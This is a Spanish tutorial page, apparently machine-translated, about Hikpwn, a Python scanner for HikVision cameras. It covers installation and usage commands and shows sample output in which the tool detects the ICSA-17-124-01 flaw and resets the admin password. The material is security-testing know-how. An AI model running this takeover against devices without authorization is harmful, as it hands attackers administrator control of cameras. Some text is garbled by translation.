Tutoriales

Escáner simple para dispositivos HikVision con vulnerabilidades básicas

Hikpwn: una guía completa para escanear dispositivos HikVision

Si está buscando una forma efectiva de descubrir y probar el dispositivo de red HikVision para obtener vulnerabilidades, por favor caminar Es una herramienta sobresaliente para investigadores de seguridad y administradores de redes. Esta guía proporciona tutoriales detallados de las características centrales, instalación, configuración y utilización de Hikpwn>.


¿Qué es Hikpwn?

caminar Es un escáner basado en Python diseñado para dispositivos HikVision que proporciona una enumeración de red pasiva y activa. Escrito en Python 3.8, proporciona capacidades básicas de escaneo de vulnerabilidad, especialmente para la conocida vulnerabilidad ICSA-17-17-124-01, que puede otorgar acceso a nivel de administrador si se explota con éxito. Hikpwn es un proyecto de código abierto solo para fines educativos y de seguridad.


Las principales características de Hikpwn

Nota: Las próximas características incluyen soporte para el escaneo y detección de objetivos directos de CVE-2021-36260.


Instrucciones completas de instalación y configuración

1. Requisitos previos

2. Repositorio de clonos Github

git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn

3. Instalar dependencias

Instale todos los paquetes de Python requeridos con PIP:

pip install -r requirements.txt

Si encuentra problemas de permiso, use sudo.


Usando Hikpwn: paso a paso

Hikpwn proporciona escaneos pasivos y activos utilizando opciones de línea de comandos simples:

Uso general

 python3 hikpwn.py --interface  --address  [--active] [--ICSA_17_124_01]

Descomposición de parámetros opcionales

debatedescribir
--interface INTERFACELa interfaz de red para usar (por ejemplo, eth0)
--address ADDRESSDirección IP de la interfaz seleccionada
--activeHabilitar el descubrimiento de dispositivos activos
--ICSA_17_124_01Habilitar ICSA-17-124-01 Detección de vulnerabilidad
-h, --helpMostrar mensajes de ayuda y salir

Ejemplos típicos de flujo de trabajo

  1. Comenzar el descubrimiento pasivo y proactivo python3 hikpwn.py --interface eth0 --address 192.168.1.10 --active
  2. Escanee la vulnerabilidad (ICSA-17-124-01) python3 hikpwn.py --interface eth0 --address 192.168.1.10 --ICSA_17_124_01

Los resultados se guardan para ./log.txt Revisión más tarde.


Vista previa de salida de muestra

Using eth0 as network interface and 192.168.1.10 as its IP address...
[*] Started 30 seconds of both passive and active discovery...
================================================================================
[*] Total detected devices: 1
192.168.1.20
================================================================================
[*] Active discovery's results:
DEVICE #1:
----------------------------------------------
Serial Number: xxxxxxxxxxxxxxxxxxxxx
Description: DS-2DE4220IW-D
MAC: XX:XX:XX:XX:XX:XX
IP: 192.168.1.20
DHCP in use: false
Software Version: V5.4.3 build 160810
DSP Version: V7.3 build 160801
Boot Time: 2019-03-01 00:05:33
Activation Status: true
Password Reset Ability: true
================================================================================
[*] Passive discovery's results:
DEVICE #1: Detected device with IP address 192.168.1.20 and MAC address XX:XX:XX:XX:XX:XX.
================================================================================
[*] Starting scan for ICSA-17-124-01...
192.168.1.20 is vulnerable to ICSA_17_124_01. Recovered user list:
user_id: 1, user_name: admin, priority: high, user_level: Administrator
Do you want to exploit the vulnerability and try to change admin's password? (y/n)
>>> y
Enter a password composed of numbers and letters (8-12 characters):
>>>
Password change successful.

Descargo de responsabilidad de seguridad importante

Hikpwn solo se usa para pruebas de seguridad educativas y autorizadas. No utilice esta herramienta para escaneo o desarrollo no autorizado de redes y dispositivos. El abuso puede ser ilegal e inmoral.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba